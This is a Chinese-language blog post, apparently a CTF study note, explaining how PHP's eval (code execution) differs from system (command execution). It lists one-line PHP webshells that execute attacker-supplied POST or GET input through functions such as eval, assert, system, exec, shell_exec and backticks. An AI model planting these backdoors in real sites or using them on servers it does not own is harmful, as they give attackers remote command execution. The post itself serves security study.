eval函数和system函数的区别 --代码执行和命令执行

最新推荐文章于 2024-02-09 07:00:00 发布
最新推荐文章于 2024-02-09 07:00:00 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/125802217
版权

做题的时候发现 eval 和system被我弄混淆了,才想起来eval 是代码执行,而system 是命令执行。

eval 和system 的比较:

<?php
system("echo 5+5;");    命令执行
//5+5

eval("echo 5+5;");       代码执行
//10
?>
<?php
    $num=1;
    eval("\$a = $num;");    //有效,$a=1
    system("\$b = $num;");  //无效,$b=NULL  
?>
<?php
    system("ls");    //命令被执行
	eval("ls");      //命令不被执行
?>

代码执行:

1-eval
<?php eval($_POST[1]) ?>

2-assert
<?php assert($_POST[1]) ?>

3-call_user_func
<?php
    call_user_func($_POST["fun"],$_POST["para"])
?>
//post::fun=assert&para=phpinfo();


4-create_function
<?php 
    $a= $_POST['func'];
    $b = create_function('$a',"echo $a");
    $b('');
?>
//post:func=phpinfo();

5-array_map
<?php
    $array = array(0,1,2,3,4,5);
    array_map($_GET['func'],$array);
?>
//post:func=phpinfo

命令执行:

1-system
<?php system($_POST[1]);?>

2-passthru
<?php passthru($_POST[1]);?>

3-exec
<?php echo exec($_POST[1]);?>

4-pcntl_exec
<?php 
    pcntl_exec("/bin/bash",array($_POST[1]));
?>

5-shell_exec
<?php echo shell_exec($_POST[1]); ?>

6-popen()/proc_popen()
<?php $handle = popen("/bin/ls","r");?>

7-``
<?php echo `whoami`?>

8-
<?php
	$cmd = 'system';
	ob_start($cmd)
	echo "$_GET[a]";
	ob_end_flush();
?>
//?a=whoami

snowlyzz
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php system eval,PHP后门的eval类和system类 函数到底有哪些区别
weixin_31960145的博客
04-12 894
一、一直以来对PHP的eval这一类函数和system这一类存在疑惑的地方,今天彻底研究了一下,写查PHP一句话的时候可以更有把握一些。其实都是一些满基础的知识,大佬别喷。干安全的基础很重要。二、PHP的eval类型函数,一句话:代码执行而不是命令执行。(菜刀用这类)1、简单类//#1-evaleval($_POST["cmd"])?>//post:cmd=phpinfo();//#2-as...
关于动态执行代码(js的Eval)实例详解
01-19
函数可能都不会陌生,我们可以用它来实现动态代码执行,我自己甚至写过一个网页专门用来计算算术表达式的,计算能力上比google、baidu的计算器还要好一些,至少精度要高,但是如果超出了四则运算的话,表达式的...
命令执行漏洞
weixin_46273733的博客
01-15 411
命令执行漏洞 命令执行漏洞是指攻击者可以随意执行系统命令。 OS命令执行漏洞示例 Web应用程序DVWA(著名的渗透测试演练平台)提供了测试域名/IP的Ping 服务(命令执行漏洞测试模块),并将Ping 命令执行过程显示出来。下面测试域名www.xser.com是否可以正常连接,如图所示 由于命令可以连接执行,因此 命令执行漏洞 命令执行漏洞是直接调用操作系统命令,故这里叫作OS命令执行漏洞,而代码执行漏洞则是靠执行脚本代码调用操作系统命令,如:
php中eval和system的细节使用(配合文件上传漏洞)
Yuppie001的博客
12-19 1450
1.eval():函数用于执行作为字符串提供的 PHP 代码。这意味着它将一个 PHP 代码字符串作为参数,并执行它,就像它是常规的 PHP 代码一样。2.system(): 函数用于在 PHP 脚本中执行外部程序或者 shell 命令。它将命令传递给命令行并输出结果。
eval函数和system函数区别——代码执行漏洞和命令执行漏洞
weixin_43376075的博客
03-29 5765
eval()函数和system()函数区别(代码执行命令执行)
PHP代码审计-PHP危险函数及特殊函数
forget_mt的博客
02-20 964
PHP代码审计-PHP危险函数及特殊函数
PHP中常见的命令执行函数代码执行函数
热门推荐
→_→
10-22 1万+
参考: https://blog.csdn.net/weixin_43376075/article/details/105189017 https://blog.csdn.net/qq_43168364/article/details/105595532 https://www.cnblogs.com/-qing-/p/10819069.html 代码执行函数: 1- eval() #传入的参数必须为PHP代码,既需要以分号结尾。 #命令執行:cmd=system(whoami); #菜.
浅谈PHP eval()函数定义和用法
12-18
总之,`eval()`函数在特定场景下是很有用的,比如动态代码执行或存储代码以备后用。然而,由于其潜在的安全风险,应当谨慎使用,并确保对传递给`eval()`的字符串有严格的控制。在编写代码时,应优先考虑其他替代方案...
php eval函数用法总结
12-19
这个功能在某些情况下非常有用,比如动态生成代码或者在数据库中存储和执行脚本。然而,由于其潜在的安全风险,使用时需要格外谨慎。 ### 1. `eval()` 基本用法 `eval()` 的基本语法是 `eval(phpcode)`,其中 `...
matlab开发-直接向前复制和粘贴函数
08-26
`evalc` 可以执行命令行字符串,并捕获其输出,而`system` 只是执行命令但不返回任何输出。在Windows系统中,可能需要用到`clip.exe` 命令来与剪贴板交互;在Linux或MacOS中,可能需要使用`pbcopy` 和 `pbpaste` ...
Linux eval命令教程:如何在Linux中执行变量作为命令(附实例详解和注意事项)
最新发布
u012964600的博客
02-09 1612
eval是一个内置的Linux命令,用于将指定的参数作为shell命令执行。它将参数组合成一个字符串,并将其作为输入提供给shell,然后在当前的shell环境中执行生成的命令
PHP后门的eval类和system类 函数到底有哪些区别
weixin_30760895的博客
12-27 548
一、   一直以来对PHP的eval这一类函数和system这一类存在疑惑的地方,今天彻底研究了一下,写查PHP一句话的时候可以更有把握一些。其实都是一些满基础的知识,大佬别喷。干安全的基础很重要。 二、PHP的eval类型函数,一句话:代码执行而不是命令执行。(菜刀用这类) 1、简单类 1 //#1-eval 2 <?php 3 eval($_POST[...
关于命令执行与反序列化
wouderw的博客
11-10 159
Impossible级别的代码加入了Anti-CSRF token,同时对参数ip进行了严格的限制,只有诸如“数字.数字.数字.数字”的输入才会被接收执行,因此不存在命令注入漏洞。当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。然后我们将这串值中的可控变量替换为我们的攻击代码,(即得到序列化值,将正常的值替换为攻击代码,让之后执行替换的攻击代码
面试题(一)
砌墙的保安
08-28 454
文章目录面试题(一)1.SSRF漏洞利用2.数据库种类?3.文件上传绕过?4. 常见的解析漏洞与原理?5. web常用的加密算法有什么6. XSS除了获取cookies还能干嘛?7. 对于安全的理解?8. eval和system的区别?9. mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?10.渗透测试过程中发现一个只能上传zip文件的功能,有什么可能的思路?11.说出常见的几种端口12. csrf与ssrf有什么区别,如何利用13.sql注入是什么?有那些注入?14 报错注入有那些函数,原理
PHP-代码执行函数-命令执行函数
weixin_47112073的博客
10-21 6238
简单写一下代码执行函数命令执行函数有哪些,并且说说他们的不同
Python笔记二:eval()的特殊用法
m0_61598337的博客
07-21 1295
eval()的特殊用法及安全隐患
【心得】PHP的代码执行个人笔记
uuzeray的博客
11-15 422
(摘要)Code指脚本语言(php)的代码eval总结:eval(字符串) 表示将字符串按照php的代码执行php动态函数调用命令执行代码执行区别前者执行操作系统命令 或者执行 脚本语言的代码函数返回值 函数名字(函数参数);1 危险函数利用2 过滤了黑名单如果仅仅在代码中过滤了函数名称,那么大概率就等于 没过滤??`$_GET[2]`;无回显情况下的命令执行通道数据传输的路径shell_execsystem 相比,没有回显结果。
php 执行命令,PHP如何执行系统命令
weixin_34236986的博客
03-09 806
PHP中通过system、shell_exec、exec和passthru方法来执行系统命令。system执行外部程序(命令行);shell_exec通过shell环境执行命令;exec执行一个外部程序;passthru执行外部程序。通过执行系统命令,我们可以调用系统的一些功能,甚至能与其他语言进行交互。1、system() :system — 执行外部程序(命令行),并且显示输出这个函数会将结果...
linux命令详解--eval
vvangxilong的博客
07-28 5848
2.2eval嵌套无意义,在其他语言中可以通过eval_r(eval_r("code")),来执行执行动态生成的code的返回),而由于shell中eval将后面的eval命令简单当作命令字符串执行,失去了嵌套作用,嵌套被命令替换取代。shell也提供了eval命令,如同熟悉的其他脚本语言,会将它的参数做为命令执行,初看会疑惑为什么shell要提供两种动态执行命令字串的机制,但是经过仔细分析,才发现shell的eval同其他语言有很大区别。这个命令要用好,就要费一定的功夫。...
命令执行函数代码执行函数区别
06-11
代码执行函数则是用于执行一段程序代码函数,通常用于动态生成和执行程序代码,例如在编程语言中动态加载和执行模块等。 具体而言,命令执行函数通常接收一个字符串参数,该参数表示要执行的系统命令,然后将该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值